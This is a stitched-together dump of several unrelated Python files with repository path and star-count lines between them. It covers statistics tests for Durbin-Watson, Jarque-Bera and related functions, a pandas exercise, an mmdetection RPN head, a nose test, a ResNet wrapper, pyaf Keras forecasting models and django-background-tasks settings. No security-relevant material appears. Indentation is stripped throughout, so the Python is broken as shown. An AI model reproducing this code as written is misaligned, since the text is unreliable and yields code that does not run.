x = np.array([-0.1184, -1.3403, 0.0063, -0.612, -0.3869, -0.2313, -2.8485,
-0.2167, 0.4153, 1.8492, -0.3706, 0.9726, -0.1501, -0.0337,
-1.4423, 1.2489, 0.9182, -0.2331, -0.6182, 0.183])
def test_durbin_watson():
#benchmark values from R car::durbinWatsonTest(x)
#library("car")
#> durbinWatsonTest(x)
#[1] 1.95298958377419
#> durbinWatsonTest(x**2)
#[1] 1.848802400319998
#> durbinWatsonTest(x[2:20]+0.5*x[1:19])
#[1] 1.09897993228779
#> durbinWatsonTest(x[2:20]+0.8*x[1:19])
#[1] 0.937241876707273
#> durbinWatsonTest(x[2:20]+0.9*x[1:19])
#[1] 0.921488912587806
st_R = 1.95298958377419
assert_almost_equal(durbin_watson(x), st_R, 14)
st_R = 1.848802400319998
assert_almost_equal(durbin_watson(x**2), st_R, 14)
st_R = 1.09897993228779
assert_almost_equal(durbin_watson(x[1:] + 0.5 * x[:-1]), st_R, 14)
st_R = 0.937241876707273
assert_almost_equal(durbin_watson(x[1:] + 0.8 * x[:-1]), st_R, 14)
st_R = 0.921488912587806
assert_almost_equal(durbin_watson(x[1:] + 0.9 * x[:-1]), st_R, 14)
X = np.array([x, x])
st_R = 1.95298958377419
assert_almost_equal(durbin_watson(X, axis=1), np.array([st_R, st_R]), 14)
assert_almost_equal(durbin_watson(X.T, axis=0), np.array([st_R, st_R]), 14)
def test_omni_normtest():
#tests against R fBasics
from scipy import stats
st_pv_R = np.array(
[[3.994138321207883, -1.129304302161460, 1.648881473704978],
[0.1357325110375005, 0.2587694866795507, 0.0991719192710234]])
nt = omni_normtest(x)
assert_almost_equal(nt, st_pv_R[:, 0], 14)
st = stats.skewtest(x)
assert_almost_equal(st, st_pv_R[:, 1], 14)
kt = stats.kurtosistest(x)
assert_almost_equal(kt, st_pv_R[:, 2], 11)
st_pv_R = np.array(
[[34.523210399523926, 4.429509162503833, 3.860396220444025],
[3.186985686465249e-08, 9.444780064482572e-06, 1.132033129378485e-04]])
x2 = x**2
#TODO: fix precision in these tests with relative tolerance
nt = omni_normtest(x2)
assert_almost_equal(nt, st_pv_R[:, 0], 12)
st = stats.skewtest(x2)
assert_almost_equal(st, st_pv_R[:, 1], 12)
kt = stats.kurtosistest(x2)
assert_almost_equal(kt, st_pv_R[:, 2], 12)
def test_omni_normtest_axis(reset_randomstate):
#test axis of omni_normtest
x = np.random.randn(25, 3)
nt1 = omni_normtest(x)
nt2 = omni_normtest(x, axis=0)
nt3 = omni_normtest(x.T, axis=1)
assert_almost_equal(nt2, nt1, decimal=13)
assert_almost_equal(nt3, nt1, decimal=13)
def test_jarque_bera():
#tests against R fBasics
st_pv_R = np.array([1.9662677226861689, 0.3741367669648314])
jb = jarque_bera(x)[:2]
assert_almost_equal(jb, st_pv_R, 14)
st_pv_R = np.array([78.329987305556, 0.000000000000])
jb = jarque_bera(x**2)[:2]
assert_almost_equal(jb, st_pv_R, 13)
st_pv_R = np.array([5.7135750796706670, 0.0574530296971343])
jb = jarque_bera(np.log(x**2))[:2]
assert_almost_equal(jb, st_pv_R, 14)
st_pv_R = np.array([2.6489315748495761, 0.2659449923067881])
jb = jarque_bera(np.exp(-x**2))[:2]
assert_almost_equal(jb, st_pv_R, 14)
def test_shapiro():
#tests against R fBasics
#testing scipy.stats
from scipy.stats import shapiro
st_pv_R = np.array([0.939984787255526, 0.239621898000460])
sh = shapiro(x)
assert_almost_equal(sh, st_pv_R, 4)
#st is ok -7.15e-06, pval agrees at -3.05e-10
st_pv_R = np.array([5.799574255943298e-01, 1.838456834681376e-06 * 1e4])
sh = shapiro(x**2) * np.array([1, 1e4])
assert_almost_equal(sh, st_pv_R, 5)
st_pv_R = np.array([0.91730442643165588, 0.08793704167882448])
sh = shapiro(np.log(x**2))
assert_almost_equal(sh, st_pv_R, 5)
#diff is [ 9.38773155e-07, 5.48221246e-08]
st_pv_R = np.array([0.818361863493919373, 0.001644620895206969])
sh = shapiro(np.exp(-x**2))
assert_almost_equal(sh, st_pv_R, 5)
def test_adnorm():
#tests against R fBasics
st_pv = []
st_pv_R = np.array([0.5867235358882148, 0.1115380760041617])
ad = normal_ad(x)
assert_almost_equal(ad, st_pv_R, 12)
st_pv.append(st_pv_R)
st_pv_R = np.array([2.976266267594575e+00, 8.753003709960645e-08])
ad = normal_ad(x**2)
assert_almost_equal(ad, st_pv_R, 11)
st_pv.append(st_pv_R)
st_pv_R = np.array([0.4892557856308528, 0.1968040759316307])
ad = normal_ad(np.log(x**2))
assert_almost_equal(ad, st_pv_R, 12)
st_pv.append(st_pv_R)
st_pv_R = np.array([1.4599014654282669312, 0.0006380009232897535])
ad = normal_ad(np.exp(-x**2))
assert_almost_equal(ad, st_pv_R, 12)
st_pv.append(st_pv_R)
ad = normal_ad(np.column_stack((x, x**2, np.log(x**2), np.exp(-x**2))).T,
axis=1)
assert_almost_equal(ad, np.column_stack(st_pv), 11)
def test_durbin_watson_pandas(reset_randomstate):
x = np.random.randn(50)
x_series = pd.Series(x)
assert_almost_equal(durbin_watson(x), durbin_watson(x_series), decimal=13)
class TestStattools(object):
@classmethod
def setup_class(cls):
x = np.random.standard_normal(1000)
e1, e2, e3, e4, e5, e6, e7 = np.percentile(x, (12.5, 25.0, 37.5, 50.0, 62.5, 75.0, 87.5))
c05, c50, c95 = np.percentile(x, (5.0, 50.0, 95.0))
f025, f25, f75, f975 = np.percentile(x, (2.5, 25.0, 75.0, 97.5))
mean = np.mean
kr1 = mean(((x - mean(x)) / np.std(x))**4.0) - 3.0
kr2 = ((e7 - e5) + (e3 - e1)) / (e6 - e2) - 1.2330951154852172
kr3 = (mean(x[x > c95]) - mean(x[x < c05])) / (mean(x[x > c50]) - mean(x[x < c50])) - 2.5852271228708048
kr4 = (f975 - f025) / (f75 - f25) - 2.9058469516701639
cls.kurtosis_x = x
cls.expected_kurtosis = np.array([kr1, kr2, kr3, kr4])
cls.kurtosis_constants = np.array([3.0,1.2330951154852172,2.5852271228708048,2.9058469516701639])
def test_medcouple_no_axis(self):
x = np.reshape(np.arange(100.0), (50, 2))
mc = medcouple(x, axis=None)
assert_almost_equal(mc, medcouple(x.ravel()))
def test_medcouple_1d(self):
x = np.reshape(np.arange(100.0),(50,2))
assert_raises(ValueError, _medcouple_1d, x)
def test_medcouple_symmetric(self):
mc = medcouple(np.arange(5.0))
assert_almost_equal(mc, 0)
def test_medcouple_nonzero(self):
mc = medcouple(np.array([1, 2, 7, 9, 10.0]))
assert_almost_equal(mc, -0.3333333)
def test_medcouple_int(self):
# GH 4243
mc1 = medcouple(np.array([1, 2, 7, 9, 10]))
mc2 = medcouple(np.array([1, 2, 7, 9, 10.0]))
assert_equal(mc1, mc2)
def test_medcouple_symmetry(self, reset_randomstate):
x = np.random.standard_normal(100)
mcp = medcouple(x)
mcn = medcouple(-x)
assert_almost_equal(mcp + mcn, 0)
def test_medcouple_ties(self, reset_randomstate):
x = np.array([1, 2, 2, 3, 4])
mc = medcouple(x)
assert_almost_equal(mc, 1.0 / 6.0)
def test_durbin_watson(self, reset_randomstate):
x = np.random.standard_normal(100)
dw = sum(np.diff(x)**2.0) / np.dot(x, x)
assert_almost_equal(dw, durbin_watson(x))
def test_durbin_watson_2d(self, reset_randomstate):
shape = (1, 10)
x = np.random.standard_normal(100)
dw = sum(np.diff(x)**2.0) / np.dot(x, x)
x = np.tile(x[:, None], shape)
assert_almost_equal(np.squeeze(dw * np.ones(shape)), durbin_watson(x))
def test_durbin_watson_3d(self, reset_randomstate):
shape = (10, 1, 10)
x = np.random.standard_normal(100)
dw = sum(np.diff(x)**2.0) / np.dot(x, x)
x = np.tile(x[None, :, None], shape)
assert_almost_equal(np.squeeze(dw * np.ones(shape)), durbin_watson(x, axis=1))
def test_robust_skewness_1d(self):
x = np.arange(21.0)
sk = robust_skewness(x)
assert_almost_equal(np.array(sk), np.zeros(4))
def test_robust_skewness_1d_2d(self, reset_randomstate):
x = np.random.randn(21)
y = x[:, None]
sk_x = robust_skewness(x)
sk_y = robust_skewness(y, axis=None)
assert_almost_equal(np.array(sk_x), np.array(sk_y))
def test_robust_skewness_symmetric(self, reset_randomstate):
x = np.random.standard_normal(100)
x = np.hstack([x, np.zeros(1), -x])
sk = robust_skewness(x)
assert_almost_equal(np.array(sk), np.zeros(4))
def test_robust_skewness_3d(self, reset_randomstate):
x = np.random.standard_normal(100)
x = np.hstack([x, np.zeros(1), -x])
x = np.tile(x, (10, 10, 1))
sk_3d = robust_skewness(x, axis=2)
result = np.zeros((10, 10))
for sk in sk_3d:
assert_almost_equal(sk, result)
def test_robust_skewness_4(self, reset_randomstate):
x = np.random.standard_normal(1000)
x[x > 0] *= 3
m = np.median(x)
s = x.std(ddof=0)
expected = (x.mean() - m) / s
_, _, _, sk4 = robust_skewness(x)
assert_allclose(expected, sk4)
def test_robust_kurtosis_1d_2d(self, reset_randomstate):
x = np.random.randn(100)
y = x[:, None]
kr_x = np.array(robust_kurtosis(x))
kr_y = np.array(robust_kurtosis(y, axis=None))
assert_almost_equal(kr_x, kr_y)
def test_robust_kurtosis(self):
x = self.kurtosis_x
assert_almost_equal(np.array(robust_kurtosis(x)), self.expected_kurtosis)
def test_robust_kurtosis_3d(self):
x = np.tile(self.kurtosis_x, (10, 10, 1))
kurtosis = np.array(robust_kurtosis(x, axis=2))
for i, r in enumerate(self.expected_kurtosis):
assert_almost_equal(r * np.ones((10, 10)), kurtosis[i])
def test_robust_kurtosis_excess_false(self):
x = self.kurtosis_x
expected = self.expected_kurtosis + self.kurtosis_constants
kurtosis = np.array(robust_kurtosis(x, excess=False))
assert_almost_equal(expected, kurtosis)
def test_robust_kurtosis_ab(self):
# Test custom alpha, beta in kr3
x = self.kurtosis_x
alpha, beta = (10.0, 45.0)
kurtosis = robust_kurtosis(self.kurtosis_x, ab=(alpha,beta), excess=False)
num = np.mean(x[x>np.percentile(x,100.0 - alpha)]) - np.mean(x[x<np.percentile(x,alpha)])
denom = np.mean(x[x>np.percentile(x,100.0 - beta)]) - np.mean(x[x<np.percentile(x,beta)])
assert_almost_equal(kurtosis[2], num/denom)
def test_robust_kurtosis_dg(self):
# Test custom delta, gamma in kr4
x = self.kurtosis_x
delta, gamma = (10.0, 45.0)
kurtosis = robust_kurtosis(self.kurtosis_x, dg=(delta,gamma), excess=False)
q = np.percentile(x,[delta, 100.0-delta, gamma, 100.0-gamma])
assert_almost_equal(kurtosis[3], (q[1] - q[0]) / (q[3] - q[2]))
|
notebooks/_solutions/pandas_06_groupby_operations30.py
|
rprops/Python_DS-WS
| 183 |
129657
|
hamlets = titles[titles['title'].str.contains('Hamlet')]
hamlets['title'].value_counts()
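# Hedged illustration: the solution above assumes a `titles` DataFrame with a 'title'
# column, loaded earlier in the notebook. A tiny stand-in frame (assumed data) shows the
# same pattern end to end:
import pandas as pd
_titles_demo = pd.DataFrame({'title': ['Hamlet', 'Hamlet', 'The Hamlet Affair', 'Macbeth']})
_hamlets_demo = _titles_demo[_titles_demo['title'].str.contains('Hamlet')]
_hamlets_demo['title'].value_counts()  # Hamlet: 2, The Hamlet Affair: 1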
|
mmdet/models/anchor_heads/rpn_head.py
|
TJUsym/TJU_Advanced_CV_Homework
| 1,158 |
129659
|
<reponame>TJUsym/TJU_Advanced_CV_Homework
import torch
import torch.nn as nn
import torch.nn.functional as F
from mmcv.cnn import normal_init
from mmdet.core import delta2bbox
from mmdet.ops import nms
from .anchor_head import AnchorHead
from ..registry import HEADS
@HEADS.register_module
class RPNHead(AnchorHead):
def __init__(self, in_channels, **kwargs):
super(RPNHead, self).__init__(2, in_channels, **kwargs)
def _init_layers(self):
self.rpn_conv = nn.Conv2d(
self.in_channels, self.feat_channels, 3, padding=1)
self.rpn_cls = nn.Conv2d(self.feat_channels,
self.num_anchors * self.cls_out_channels, 1)
self.rpn_reg = nn.Conv2d(self.feat_channels, self.num_anchors * 4, 1)
def init_weights(self):
normal_init(self.rpn_conv, std=0.01)
normal_init(self.rpn_cls, std=0.01)
normal_init(self.rpn_reg, std=0.01)
def forward_single(self, x):
x = self.rpn_conv(x)
x = F.relu(x, inplace=True)
rpn_cls_score = self.rpn_cls(x)
rpn_bbox_pred = self.rpn_reg(x)
return rpn_cls_score, rpn_bbox_pred
def loss(self,
cls_scores,
bbox_preds,
gt_bboxes,
img_metas,
cfg,
gt_bboxes_ignore=None):
losses = super(RPNHead, self).loss(
cls_scores,
bbox_preds,
gt_bboxes,
None,
img_metas,
cfg,
gt_bboxes_ignore=gt_bboxes_ignore)
return dict(
loss_rpn_cls=losses['loss_cls'], loss_rpn_bbox=losses['loss_bbox'])
def get_bboxes_single(self,
cls_scores,
bbox_preds,
mlvl_anchors,
img_shape,
scale_factor,
cfg,
rescale=False):
mlvl_proposals = []
for idx in range(len(cls_scores)):
rpn_cls_score = cls_scores[idx]
rpn_bbox_pred = bbox_preds[idx]
assert rpn_cls_score.size()[-2:] == rpn_bbox_pred.size()[-2:]
anchors = mlvl_anchors[idx]
rpn_cls_score = rpn_cls_score.permute(1, 2, 0)
if self.use_sigmoid_cls:
rpn_cls_score = rpn_cls_score.reshape(-1)
scores = rpn_cls_score.sigmoid()
else:
rpn_cls_score = rpn_cls_score.reshape(-1, 2)
scores = rpn_cls_score.softmax(dim=1)[:, 1]
rpn_bbox_pred = rpn_bbox_pred.permute(1, 2, 0).reshape(-1, 4)
if cfg.nms_pre > 0 and scores.shape[0] > cfg.nms_pre:
_, topk_inds = scores.topk(cfg.nms_pre)
rpn_bbox_pred = rpn_bbox_pred[topk_inds, :]
anchors = anchors[topk_inds, :]
scores = scores[topk_inds]
proposals = delta2bbox(anchors, rpn_bbox_pred, self.target_means,
self.target_stds, img_shape)
if cfg.min_bbox_size > 0:
w = proposals[:, 2] - proposals[:, 0] + 1
h = proposals[:, 3] - proposals[:, 1] + 1
valid_inds = torch.nonzero((w >= cfg.min_bbox_size) &
(h >= cfg.min_bbox_size)).squeeze()
proposals = proposals[valid_inds, :]
scores = scores[valid_inds]
proposals = torch.cat([proposals, scores.unsqueeze(-1)], dim=-1)
proposals, _ = nms(proposals, cfg.nms_thr)
proposals = proposals[:cfg.nms_post, :]
mlvl_proposals.append(proposals)
proposals = torch.cat(mlvl_proposals, 0)
if cfg.nms_across_levels:
proposals, _ = nms(proposals, cfg.nms_thr)
proposals = proposals[:cfg.max_num, :]
else:
scores = proposals[:, 4]
num = min(cfg.max_num, proposals.shape[0])
_, topk_inds = scores.topk(num)
proposals = proposals[topk_inds, :]
return proposals
|
desktop/core/ext-py/nose-1.3.7/functional_tests/doc_tests/test_issue119/test_zeronine.py
|
kokosing/hue
| 5,079 |
129691
|
import os
import unittest
from nose.plugins import Plugin
from nose.plugins.plugintest import PluginTester
from nose.plugins.manager import ZeroNinePlugin
here = os.path.abspath(os.path.dirname(__file__))
support = os.path.join(os.path.dirname(os.path.dirname(here)), 'support')
class EmptyPlugin(Plugin):
pass
class TestEmptyPlugin(PluginTester, unittest.TestCase):
activate = '--with-empty'
plugins = [ZeroNinePlugin(EmptyPlugin())]
suitepath = os.path.join(here, 'empty_plugin.rst')
def test_empty_zero_nine_does_not_crash(self):
print self.output
assert "'EmptyPlugin' object has no attribute 'loadTestsFromPath'" \
not in self.output
|
code/resnet.py
|
noammy/videowalk
| 227 |
129706
|
<filename>code/resnet.py
import torch
import torch.nn as nn
try:
from torch.hub import load_state_dict_from_url
except ImportError:
from torch.utils.model_zoo import load_url as load_state_dict_from_url
import torchvision.models.resnet as torch_resnet
from torchvision.models.resnet import BasicBlock, Bottleneck
model_urls = {'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
}
class ResNet(torch_resnet.ResNet):
def __init__(self, *args, **kwargs):
super(ResNet, self).__init__(*args, **kwargs)
def modify(self, remove_layers=[], padding=''):
# Set stride of layer3 and layer 4 to 1 (from 2)
filter_layers = lambda x: [l for l in x if getattr(self, l) is not None]
for layer in filter_layers(['layer3', 'layer4']):
for m in getattr(self, layer).modules():
if isinstance(m, torch.nn.Conv2d):
m.stride = tuple(1 for _ in m.stride)
print('stride', m)
# Set padding (zeros or reflect, doesn't change much;
# zeros requires lower temperature)
if padding != '':
for m in self.modules():
if isinstance(m, torch.nn.Conv2d) and sum(m.padding) > 0:
m.padding_mode = padding
print('padding', m)
# Remove extraneous layers
remove_layers += ['fc', 'avgpool']
for layer in filter_layers(remove_layers):
setattr(self, layer, None)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = x if self.maxpool is None else self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = x if self.layer3 is None else self.layer3(x)
x = x if self.layer4 is None else self.layer4(x)
return x
def _resnet(arch, block, layers, pretrained, progress, **kwargs):
model = ResNet(block, layers, **kwargs)
if pretrained:
state_dict = load_state_dict_from_url(model_urls[arch],
progress=progress)
model.load_state_dict(state_dict)
return model
def resnet18(pretrained=False, progress=True, **kwargs):
return _resnet('resnet18', BasicBlock, [2, 2, 2, 2], pretrained, progress,
**kwargs)
def resnet50(pretrained=False, progress=True, **kwargs) -> ResNet:
return _resnet('resnet50', Bottleneck, [3, 4, 6, 3], pretrained, progress,
**kwargs)
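# Hedged usage sketch (not part of the original file): build a backbone the way the
# surrounding project appears to use it - dense features with stride-1 layer3, the
# classifier head removed, and reflect padding. Shapes below are illustrative.
if __name__ == "__main__":
    net = resnet18(pretrained=False)
    net.modify(remove_layers=["layer4"], padding="reflect")
    feats = net(torch.randn(1, 3, 64, 64))
    print(feats.shape)  # torch.Size([1, 256, 8, 8]) for resnet18 without layer4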
|
pyaf/TS/Keras_Models.py
|
shaido987/pyaf
| 377 |
129713
|
<reponame>shaido987/pyaf
import numpy as np
import pandas as pd
# from sklearn.preprocessing import StandardScaler, MinMaxScaler
from . import SignalDecomposition_AR as tsar
import sys
class cAbstract_RNN_Model(tsar.cAbstractAR):
def __init__(self , cycle_residue_name, P , iExogenousInfo = None):
super().__init__(cycle_residue_name, iExogenousInfo)
self.mNbLags = P;
self.mNbExogenousLags = P;
self.mComplexity = P;
self.mHiddenUnits = P;
self.mNbEpochs = 50;
sys.setrecursionlimit(1000000);
def dumpCoefficients(self, iMax=10):
# print(self.mModel.__dict__);
pass
def build_RNN_Architecture(self):
assert(0);
# def reshape_inputs(self, iInputs):
# return iInputs;
def reshape_inputs(self, iInputs):
lInputs = np.reshape(iInputs, (iInputs.shape[0], 1, iInputs.shape[1]))
return lInputs;
def fit(self):
# print("ESTIMATE_RNN_MODEL_START" , self.mCycleResidueName);
from keras import callbacks
self.build_RNN_Architecture();
# print("ESTIMATE_RNN_MODEL_STEP1" , self.mOutName);
series = self.mCycleResidueName;
self.mTime = self.mTimeInfo.mTime;
self.mSignal = self.mTimeInfo.mSignal;
lAREstimFrame = self.mSplit.getEstimPart(self.mARFrame)
# print("ESTIMATE_RNN_MODEL_STEP2" , self.mOutName);
# print("mAREstimFrame columns :" , self.mAREstimFrame.columns);
lARInputs = lAREstimFrame[self.mInputNames].values
lARTarget = lAREstimFrame[series].values
# print(len(self.mInputNames), lARInputs.shape , lARTarget.shape)
assert(lARInputs.shape[1] > 0);
assert(lARTarget.shape[0] > 0);
# print("ESTIMATE_RNN_MODEL_STEP3" , self.mOutName);
lARInputs = self.reshape_inputs(lARInputs)
lARTarget = self.reshape_target(lARTarget)
N = lARInputs.shape[0];
NEstim = (N * 4) // 5;
estimX = lARInputs[0:NEstim]
estimY = lARTarget[0:NEstim]
valX = lARInputs[ NEstim : ]
valY = lARTarget[ NEstim : ]
# print("SHAPES" , self.mFormula, estimX.shape , estimY.shape)
# print("ESTIMATE_RNN_MODEL_STEP4" , self.mOutName);
lStopCallback = callbacks.EarlyStopping(monitor='val_loss', patience=5, verbose=0, mode='auto')
lHistory = self.mModel.fit(estimX, estimY,
epochs=self.mNbEpochs,
batch_size=1,
validation_data=(valX , valY),
verbose=0,
callbacks=[lStopCallback])
# print(lHistory.__dict__)
# print("ESTIMATE_RNN_MODEL_STEP5" , self.mOutName);
lFullARInputs = self.mARFrame[self.mInputNames].values;
lFullARInputs = self.reshape_inputs(lFullARInputs)
# print("ESTIMATE_RNN_MODEL_STEP6" , self.mOutName);
lPredicted = self.mModel.predict(lFullARInputs);
# print("PREDICTED_SHAPE" , self.mARFrame.shape, lPredicted.shape);
# print("ESTIMATE_RNN_MODEL_STEP7" , self.mOutName);
self.mARFrame[self.mOutName] = np.reshape(lPredicted, (lPredicted.shape[0]))
# print("ESTIMATE_RNN_MODEL_STEP8" , self.mOutName);
self.mARFrame[self.mOutName + '_residue'] = self.mARFrame[series] - self.mARFrame[self.mOutName]
# print("ESTIMATE_RNN_MODEL_END" , self.mOutName, self.mModel.__dict__);
# self.testPickle_old();
def transformDataset(self, df, horizon_index = 1):
series = self.mCycleResidueName;
if(self.mExogenousInfo is not None):
df = self.mExogenousInfo.transformDataset(df);
# print(df.columns);
# print(df.info());
# print(df.head());
# print(df.tail());
lag_df = self.generateLagsForForecast(df);
# print(self.mInputNames);
# lag_df.to_csv("LAGGED_ " + str(self.mNbLags) + ".csv");
inputs = lag_df[self.mInputNames].values
inputs = self.reshape_inputs(inputs)
# print("BEFORE_PREDICT", self.mFormula, "\n", self.mModel.__dict__);
lPredicted = self.mModel.predict(inputs)
lPredicted = np.reshape(lPredicted, (lPredicted.shape[0]))
df[self.mOutName] = lPredicted;
target = df[series].values
df[self.mOutName + '_residue'] = target - df[self.mOutName].values
return df;
class cMLP_Model(cAbstract_RNN_Model):
gTemplateModels = {};
def __init__(self , cycle_residue_name, P , iExogenousInfo = None):
super().__init__(cycle_residue_name, P, iExogenousInfo)
def build_RNN_Architecture(self):
lModel = None;
if(self.mNbLags not in cMLP_Model.gTemplateModels.keys()):
lModel = self.build_RNN_Architecture_template();
cMLP_Model.gTemplateModels[self.mNbLags] = lModel;
import copy;
self.mModel = copy.copy(cMLP_Model.gTemplateModels[self.mNbLags]);
self.mModel.reset_states();
# print(cMLP_Model.gTemplateModels[self.mNbLags].__dict__);
# print(self.mModel.__dict__);
self.mFormula = "MLP(" + str(self.mNbLags) + ")";
self.mOutName = self.mCycleResidueName + '_MLP(' + str(self.mNbLags) + ")";
def __getstate__(self):
dict_out = self.__dict__.copy();
dict_out["mModel"] = self.mModel.to_json();
# print("GET_STATE_LSTM", dict_out);
return dict_out;
def __setstate__(self, istate):
# print("LSTM_SET_STATE" , istate);
from keras.models import model_from_json
self.__dict__ = istate.copy();
self.mModel = model_from_json(istate["mModel"]);
def build_RNN_Architecture_template(self):
from keras.models import Sequential
from keras.layers import Dense, Dropout
from keras.layers import LSTM
# import theano
# print(theano.config)
lModel = Sequential()
lModel.add(Dense(self.mHiddenUnits, input_shape=(1, self.mNbLags)))
lModel.add(Dropout(0.1))
lModel.add(Dense(1))
lModel.compile(loss='mse', optimizer='adam')
return lModel;
def reshape_target(self, iTarget):
return np.reshape(iTarget, (iTarget.shape[0], 1, 1))
class cLSTM_Model(cAbstract_RNN_Model):
gTemplateModels = {};
def __init__(self , cycle_residue_name, P , iExogenousInfo = None):
super().__init__(cycle_residue_name, P, iExogenousInfo)
def build_RNN_Architecture(self):
lModel = None;
if(self.mNbLags not in cLSTM_Model.gTemplateModels.keys()):
lModel = self.build_RNN_Architecture_template();
cLSTM_Model.gTemplateModels[self.mNbLags] = lModel;
import copy;
self.mModel = copy.copy(cLSTM_Model.gTemplateModels[self.mNbLags]);
self.mModel.reset_states();
# print(cLSTM_Model.gTemplateModels[self.mNbLags].__dict__);
# print(self.mModel.__dict__);
self.mFormula = "LSTM(" + str(self.mNbLags) + ")";
self.mOutName = self.mCycleResidueName + '_LSTM(' + str(self.mNbLags) + ")";
def build_RNN_Architecture_template(self):
from keras.models import Sequential
from keras.layers import Dense, Dropout
from keras.layers import LSTM
# import theano
# theano.config.reoptimize_unpickled_function = False
# theano.config.cxx = ""
lModel = Sequential()
lModel.add(LSTM(self.mHiddenUnits, input_shape=(1, self.mNbLags)))
lModel.add(Dropout(0.1))
lModel.add(Dense(1))
lModel.compile(loss='mse', optimizer='adam')
return lModel;
def testPickle_old(self):
import pickle
out1 = pickle.dumps(self.mModel);
lModel2 = pickle.loads(out1);
out2 = pickle.dumps(lModel2);
print(sorted(self.mModel.__dict__))
print(sorted(lModel2.__dict__))
for (k , v) in self.mModel.__dict__.items():
print(k , self.mModel.__dict__[k])
print(k , lModel2.__dict__[k])
assert(out1 == out2)
print("TEST_PICKLE_OLD_OK")
def testPickle(self):
import dill
dill.settings['recurse'] = False
out1 = dill.dumps(self.mModel);
lModel2 = dill.loads(out1);
out2 = dill.dumps(lModel2);
print(sorted(self.mModel.__dict__))
print(sorted(lModel2.__dict__))
for (k , v) in self.mModel.__dict__.items():
print(k , self.mModel.__dict__[k])
print(k , lModel2.__dict__[k])
assert(out1 == out2)
print("TEST_PICKLE_OK")
def __getstate__(self):
dict_out = self.__dict__.copy();
dict_out["mModel"] = self.mModel.to_json();
# print("GET_STATE_LSTM", dict_out);
return dict_out;
def __setstate__(self, istate):
# print("LSTM_SET_STATE" , istate);
from keras.models import model_from_json
self.__dict__ = istate.copy();
self.mModel = model_from_json(istate["mModel"]);
def reshape_target(self, iTarget):
return iTarget
|
background_task/settings.py
|
radomirvrana/django-background-tasks
| 586 |
129719
|
<reponame>radomirvrana/django-background-tasks
# -*- coding: utf-8 -*-
import multiprocessing
from django.conf import settings
try:
cpu_count = multiprocessing.cpu_count()
except Exception:
cpu_count = 1
class AppSettings(object):
"""
"""
@property
def MAX_ATTEMPTS(self):
"""Control how many times a task will be attempted."""
return getattr(settings, 'MAX_ATTEMPTS', 25)
@property
def BACKGROUND_TASK_MAX_ATTEMPTS(self):
"""Control how many times a task will be attempted."""
return self.MAX_ATTEMPTS
@property
def MAX_RUN_TIME(self):
"""Maximum possible task run time, after which tasks will be unlocked and tried again."""
return getattr(settings, 'MAX_RUN_TIME', 3600)
@property
def BACKGROUND_TASK_MAX_RUN_TIME(self):
"""Maximum possible task run time, after which tasks will be unlocked and tried again."""
return self.MAX_RUN_TIME
@property
def BACKGROUND_TASK_RUN_ASYNC(self):
"""Control if tasks will run asynchronous in a ThreadPool."""
return getattr(settings, 'BACKGROUND_TASK_RUN_ASYNC', False)
@property
def BACKGROUND_TASK_ASYNC_THREADS(self):
"""Specify number of concurrent threads."""
return getattr(settings, 'BACKGROUND_TASK_ASYNC_THREADS', cpu_count)
@property
def BACKGROUND_TASK_PRIORITY_ORDERING(self):
"""
Control the ordering of tasks in the queue.
Choose either `DESC` or `ASC`.
https://en.m.wikipedia.org/wiki/Nice_(Unix)
A niceness of −20 is the highest priority and 19 is the lowest priority. The default niceness for processes is inherited from its parent process and is usually 0.
"""
order = getattr(settings, 'BACKGROUND_TASK_PRIORITY_ORDERING', 'DESC')
if order == 'ASC':
prefix = ''
else:
prefix = '-'
return prefix
app_settings = AppSettings()
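# Hedged usage sketch (illustrative, not part of the package): consumers read computed
# values from the `app_settings` singleton, and a Django project overrides them in its
# settings.py. The override values below are assumptions.
#
#   from background_task.settings import app_settings
#   max_attempts = app_settings.MAX_ATTEMPTS                          # 25 unless overridden
#   prefix = app_settings.BACKGROUND_TASK_PRIORITY_ORDERING           # '-' (DESC) by default
#
#   # in a project's settings.py
#   MAX_ATTEMPTS = 10
#   BACKGROUND_TASK_RUN_ASYNC = True
#   BACKGROUND_TASK_PRIORITY_ORDERING = 'ASC'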
|